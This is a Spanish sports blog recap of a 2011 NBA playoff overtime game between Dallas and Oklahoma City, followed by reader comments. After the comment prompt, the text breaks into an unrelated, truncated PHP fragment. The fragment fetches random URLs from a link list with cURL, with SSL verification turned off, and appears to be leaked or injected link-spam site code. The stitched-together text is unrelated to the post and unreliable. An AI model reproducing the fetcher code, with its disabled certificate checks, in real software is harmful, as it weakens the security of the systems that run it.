Playoffs (23/05/2011): En el bosque de Sherwood

24 de May de 2011 por TheDeerHunter

Anoche los Thunder se dejaron gran parte de sus esperanzas de final emboscados en otra prórroga por Robin Hood y los suyos. ¿Cómo se puede perder un partido que dominas de 15 a falta de 5 minutos para el final y donde vas arrasando por 22 rebotes de diferencia? Tiene su mérito. Nadie lo había logrado en los últimos 15 años como tampoco nadie había disfrutado de tal ventaja de rebotes en los últimos 25. Alucinante (112-105).

Esto es la gloria de los cruces: remontadas épicas, momentos de infarto y pruebas sobrehumanas de carácter. Lo que vimos. Empecemos por los aspectos positivos. Dirk Nowitzki a su mejor nivel, naloncesto puro, inmenso, mítico. Hay quien le compara a otro célebre tirador de raza blanca, también rubio y vestido de verde en nuestra memoria. Ese abanico de fintas, de mareantes movimientos con máxima eficacia y rédito en cada uno de sus gestos. Anotó 40, la 7ª actuación de +40 en playoffs de su carrera aunque este año lleva dos. Pero hay puntos y puntos y el anotó buena parte de ellos en los momentos más críticos, especialmente en esa remontada increíble. Además estuvo bien arropado por Jason Kidd, quien solía sufrir ante el tipo de rival que representa Westbrook. Ayer se impuso al joven base all-star dándole una lección que tardará en olvidar. La veteranía que se gana con el tiempo y la clase que nunca se pierde compensaron la diferencia de físico. Otro grande sin anillo. Quizás pueda haber justicia todavía. Por último buen partido de Terry y, aunque no fue el “The Matrix” del otro día buen trabajo de intendencia de Shawn Marion, taponando el tiro decisivo a Durant que podría haber evitado la prórroga.

Por los Thunder el resultado condiciona decisivamente el análisis. A priori buen partido colectivo durante casi 45 minutos, con una interesante aportación de Ibaka, Perkins, Collison y Sefolosha, además de los de siempre. El partido comenzó a torcerse por culpa de nada menos que 25 balones perdidos, 9 de Durant y 6 de Westbrook. Tampoco ayudó el 2 de 13 en triples, con un 2 de 7 de Durant y un 0 de 3 de Westbrook. La gota que terminó por matar a los Thunder fue la eliminación por faltas de James Harden justo a 5 minutos para el final. Golpe moral terrible y será difícil que se levanten.

Los Mavs tienen pie y medio en la finalísima.

PREMIOS

MVP: El alemán Dirk Nowitzi anotó 40 puntos o más en un partido de Playoffs por séptima vez en su carrera pero hoy ha de compartir premio con el incombustible Jason Kidd, autor de 17 puntos, 5 rebotes, 7 asistencias y 4 robos, así como de un triple decisivo a falta de 40 segundos para acabar la prórroga.

Sorpresa: El inicio del colapso de los Thunder coincidió exactamente con la expulsión de James Harden por acumular 6 faltas personales. Su importancia en los engranajes ofensivos del equipo va más allá de lo que dice los números.

Decepción: Kevin Durant y Russell Westbrook fueron los máximos anotadores de su equipo con 29 y 19 puntos, respectivamente, y además fueron capaces de capturar 23 rebotes entre ambos. Sin embargo, perdieron hasta 15 balones. Inaceptable.

Esfuerzo en vano: Como hemos dicho, Durant y Westbrook tuvieron un día aciago por lo que el premio del día se lo llevan los 18 puntos, 10 rebotes y 5 tapones de Serge Ibaka.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. jas dice:
    #1

    el actuación de westbrook en ultimo cuarto y prorroga fue muy lamentable, como se puede dirigir a un ekipo en ataque tan mal, xupando y fallando sin parar. Se les fundieron los plomos tanto a el como a durant y si a eso le sumas a DIRK con letras mayusculas estas perdido y eso q la defensa d collison no era para nada mala. Dirk es dios.

      Citar

  2. jas dice:
    #2

    Como dices seria una tremenda alegria para los aficionados a esta liga q Kidd se llevara un anillo, solo me faltaria Nash… pero eso va a estar mas q complicado

      Citar

  3. German dice:
    #3

    Increible el partido que se le escapa a Oklahoma, se quedaron sin ofensiva, Durant desaparecio y Westbrook fue una maquina de errores, tiro a la basura todo el esfuerzo de Collison, Ibaka, Sefolosha…
    Gran leccion de los Mavs en los ultimos minutos, Marion fue un perro de presa en defensa y Dirk metio tiros de todos los colores, sin dudas se merece el anillo…

      Citar

  4. Txusma dice:
    #4

    Westbrook se quedó cerca del triple doble pero las sensaciones son más bien negativas. No está siendo una buena serie para él.

      Citar

  5. Viva_Dirk dice:
    #5

    De Nowitzki no me queda nada que decir, es una gozada verle jugar.

      Citar

  6. Jona dice:
    #6

    “fanboy on” Mucha gente me dice que Westbrook es mejor jugador que Ellis dudo mucho que Ellis diera el “recital” que dio Westbrook ayer, cuando aprenda a tirar y dejar de correr que le llame

      Citar

  7. Denise dice:
    #7

    Por mucho que Nowitzki y los Mavs lo bordaran al final, el partido lo perdió Oklahoma, es imperdonable perder una renta así en tan poco tiempo. En fin, que los Mavs van a dar la campanada en la serie (en mi opinión, no eran favoritos) y se van a jugar el titulo previsiblemente otra vez contra los Heat….y con el mismo resulatdo final…..

      Citar

  8. Jose Luis dice:
    #8

    De todas formas, los árbitros están con Dallas toda la serie. En el primer partido a Nowitzki no se le podía tocar ni defender, estar a menos de un metro ya era falta, y en este igual, le quitan un 2+1 a Ibaka, los 3 tiros libres a Durant, y vaya falta pitan de Collison a Dirk a falta de 6.4, es de traca vamos. Son 6 puntos de diferencia esas 3 jugadas, que quieras que no, algo se nota, no hubiera habido prórroga ni de coña. A Stern le conviene que haya el morbo de repetir las finales de 2006.

      Citar

  9. GreenPride dice:
    #9

    Bueno, pues ayer vimos como suicidarse deportivamente. Hasta 5 minutos del final todo iba camino de una gran victoria para OKC con muy buenas noticias para ellos pues Westbrook había jugado bastante bien, Durant metia sus puntos y sobre todo tenían mucha ayuda de la intendencia Collison, Sefolosha, Harden y sobre todo Ibaka habían jugado un gran partido y ganaban de 15 arrasando en los tableros a los interiores de los Mavs. Cuando todo parecía decidido, 6ª falta de Harden 3 canastones de Dirk y a los Thunder les entra el canguelo. Empiezan a mirar al reloj en vez de atacar con paciencia y a perder balones y los Mavs se acercan hasta forzar la prorroga con una horrenda jugada final para ganar el partido de los Mavs que con 6.2 segundos sólo sacan para dejar que Durant se tire un triple de 10 metros que tapona Marion. Esto entra en el debe del equipo y de Brooks que no fue capaz de hacer que sus jugadores jugaran algún tipo de jugada en esos 6 segundos. Una vez en la prorroga estaba claro que los Thunder eran hombres muertos psicológicamente tras perder la ventaja y dejarse remontar.
    Enorme partido de Jason Kidd y de Robin Hood Nowitzki dando una lección de veteranía y saber estar en los momentos calientes a los jovenes Thunder. Los Mavs tienen pie y medio en las finales ¿Sera este su año contra todo pronóstico? Desde luego estan jugando como para poder conseguirlo

      Citar

  10. Albertis dice:
    #10

    Está todo dicho en los comentarios, sólo me queda una duda que no he sabido solventar, y es saber si Butler es baja definitiva o quizá podría jugar la final.
    Me hubiese gustado ver donde estarían estos Mavs si Nash no se hubiese marchado a Phoneix de nuevo…

      Citar

  11. ralage dice:
    #11

    Increíble, a falta de 2.30 y ganando de 10, de 10 puntos ….PIERDEN!!!
    Hablando de Nash, les vendría genial a los OKC, creando buenas situaciones para sus tiradores, incluso podría hacer pick and roll con Ibaka, experiencia…
    En fin esperemos que esta noche, los Bulls sigan dando batalla, espero q no hayan llegado hasta aquí para perder 4-1

      Citar

  12. ralage dice:
    #12

    Ups… 3-1 xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>